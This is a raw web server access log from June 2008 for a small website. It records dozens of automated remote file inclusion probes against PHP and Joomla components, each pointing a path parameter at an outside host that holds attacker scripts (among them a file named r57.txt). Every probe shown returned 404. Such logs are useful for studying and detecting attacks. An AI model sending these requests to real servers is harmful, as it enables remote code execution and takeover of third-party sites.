83.222.27.201 - - [08/Jun/2008:17:02:42 -0700] "GET /logs/access_080512.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:05:46 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:05:46 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:05:47 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
77.221.157.210 - - [08/Jun/2008:17:06:00 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [08/Jun/2008:17:06:00 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [08/Jun/2008:17:06:01 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [08/Jun/2008:17:06:01 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [08/Jun/2008:17:06:01 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.157.210 - - [08/Jun/2008:17:06:01 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.endmigrainepain.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [08/Jun/2008:17:06:31 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [08/Jun/2008:17:06:31 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [08/Jun/2008:17:06:32 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.118.170.87 - - [08/Jun/2008:17:06:33 -0700] "GET /logs/access_080512.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:06:37 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:06:37 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:06:38 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
89.218.85.18 - - [08/Jun/2008:17:10:21 -0700] "GET /logs/access_080421.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.59.88.19 - - [08/Jun/2008:17:10:58 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.59.88.19 - - [08/Jun/2008:17:10:58 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.59.88.19 - - [08/Jun/2008:17:10:58 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.59.88.19 - - [08/Jun/2008:17:11:34 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
209.216.213.115 - - [08/Jun/2008:17:12:13 -0700] "GET /logs/access.log/index.php?redir=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
209.216.213.115 - - [08/Jun/2008:17:12:13 -0700] "GET /index.php?redir=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
209.216.213.115 - - [08/Jun/2008:17:12:13 -0700] "GET /logs/index.php?redir=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
213.193.215.56 - - [08/Jun/2008:17:12:15 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
213.193.215.56 - - [08/Jun/2008:17:12:18 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
213.193.215.56 - - [08/Jun/2008:17:12:18 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.59.88.19 - - [08/Jun/2008:17:14:18 -0700] "GET /logs/access_080421.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
211.224.129.124 - - [08/Jun/2008:17:14:31 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.195.37.92 - - [08/Jun/2008:17:14:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
67.195.37.92 - - [08/Jun/2008:17:14:35 -0700] "GET /logs/access_080414.log HTTP/1.0" 200 1289525 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:16:19 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
189.129.32.158 - - [08/Jun/2008:17:19:11 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.216.213.115 - - [08/Jun/2008:17:20:26 -0700] "GET /index.php?redir=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
72.29.83.181 - - [08/Jun/2008:17:21:16 -0700] "GET /logs/access_080512.log//index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.83.181 - - [08/Jun/2008:17:21:16 -0700] "GET //index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.83.181 - - [08/Jun/2008:17:21:16 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:23:00 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:23:15 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:23:21 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:23:40 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.59.88.19 - - [08/Jun/2008:17:23:53 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.59.88.19 - - [08/Jun/2008:17:23:53 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:24:03 -0700] "GET /logs/access_080421.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
202.181.105.117 - - [08/Jun/2008:17:24:47 -0700] "GET /logs/access_080421.log//components/com_simpleboard/image_upload.php?sbp=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [08/Jun/2008:17:24:47 -0700] "GET /logs/access_080421.log//components/com_simpleboard/image_upload.php?sbp=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [08/Jun/2008:17:24:47 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [08/Jun/2008:17:24:47 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [08/Jun/2008:17:24:48 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [08/Jun/2008:17:24:48 -0700] "GET /logs/access_080421.log/components/com_simpleboard/image_upload.php?sbp=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [08/Jun/2008:17:24:48 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [08/Jun/2008:17:24:48 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [08/Jun/2008:17:24:48 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:25:00 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:25:00 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:25:01 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.59.88.19 - - [08/Jun/2008:17:25:49 -0700] "GET /logs/access_080421.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.83.181 - - [08/Jun/2008:17:26:56 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
213.193.215.56 - - [08/Jun/2008:17:28:01 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
213.193.215.56 - - [08/Jun/2008:17:28:02 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
213.193.215.56 - - [08/Jun/2008:17:28:03 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.104.78.250 - - [08/Jun/2008:17:28:27 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://wellingtonindustries.com/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
89.104.78.250 - - [08/Jun/2008:17:28:27 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://wellingtonindustries.com/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
89.104.78.250 - - [08/Jun/2008:17:28:28 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://wellingtonindustries.com/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
89.104.78.250 - - [08/Jun/2008:17:28:31 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://wellingtonindustries.com/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
213.193.215.56 - - [08/Jun/2008:17:28:51 -0700] "GET /logs/access_080421.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.111.11.7 - - [08/Jun/2008:17:30:33 -0700] "GET //protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:32:59 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:34:21 -0700] "GET /modules/repository/singlefile.php?cid=94&lid=1405http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.149.175.25 - - [08/Jun/2008:17:35:09 -0700] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://www.indicce.com/admin/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:35:39 -0700] "GET /logs/modules/repository/singlefile.php?cid=94&lid=1405http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:35:39 -0700] "GET /modules/repository/singlefile.php?cid=94&lid=1405http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:35:44 -0700] "GET /logs/modules/repository/singlefile.php?cid=94&lid=1405http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:35:44 -0700] "GET /modules/repository/singlefile.php?cid=94&lid=1405http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:39:40 -0700] "GET /logs/access_080512.log/modules/repository/singlefile.php?cid=94&lid=1405http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:39:40 -0700] "GET /modules/repository/singlefile.php?cid=94&lid=1405http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:39:41 -0700] "GET /logs/modules/repository/singlefile.php?cid=94&lid=1405http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:41:47 -0700] "GET /logs/access_080512.log/modules/repository/singlefile.php?cid=94&lid=1405http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:41:47 -0700] "GET /modules/repository/singlefile.php?cid=94&lid=1405http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:41:48 -0700] "GET /logs/modules/repository/singlefile.php?cid=94&lid=1405http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:42:25 -0700] "GET /logs/access_080428.log/modules/repository/singlefile.php?cid=94&lid=1405http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.111.11.7 - - [08/Jun/2008:17:43:58 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.220.144.161 - - [08/Jun/2008:17:44:19 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.mathstamps.com"
83.220.144.161 - - [08/Jun/2008:17:44:19 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.mathstamps.com"
83.220.144.130 - - [08/Jun/2008:17:44:34 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
83.220.144.130 - - [08/Jun/2008:17:44:34 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
62.140.19.142 - - [08/Jun/2008:17:45:11 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
63.247.132.129 - - [08/Jun/2008:17:45:26 -0700] "GET /logs/access_080428.log/modules/repository/singlefile.php?cid=94&lid=1405http://www.tangrei.com//admin/photos/uploads/thumbs/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.216.213.115 - - [08/Jun/2008:17:46:32 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
209.216.213.115 - - [08/Jun/2008:17:46:32 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
209.216.213.115 - - [08/Jun/2008:17:46:33 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
209.237.231.200 - - [08/Jun/2008:17:46:46 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
209.237.231.200 - - [08/Jun/2008:17:46:46 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:47:02 -0700] "GET /logs/access_080512.log//phpSecurePages/secure.php?&cfgProgDir=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:47:03 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:47:04 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:47:17 -0700] "GET /logs/access_080310.log//phpSecurePages/secure.php?&cfgProgDir=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
211.224.129.124 - - [08/Jun/2008:17:53:07 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
211.224.129.124 - - [08/Jun/2008:17:53:07 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.154.38.121 - - [08/Jun/2008:17:53:31 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.32.96.7 - - [08/Jun/2008:17:55:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
62.141.48.154 - - [08/Jun/2008:17:57:52 -0700] "GET /logs/main.php?pagina=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
62.141.48.154 - - [08/Jun/2008:17:57:53 -0700] "GET /main.php?pagina=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
211.224.129.124 - - [08/Jun/2008:17:59:49 -0700] "GET /logs/access_080421.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
201.25.155.27 - - [08/Jun/2008:17:59:49 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.58.160.45 - - [08/Jun/2008:18:03:32 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.160.45 - - [08/Jun/2008:18:03:32 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.160.45 - - [08/Jun/2008:18:03:32 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.29.75.39 - - [08/Jun/2008:18:04:12 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.75.39 - - [08/Jun/2008:18:04:12 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.22.37.144 - - [08/Jun/2008:18:06:32 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.22.37.144 - - [08/Jun/2008:18:06:32 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
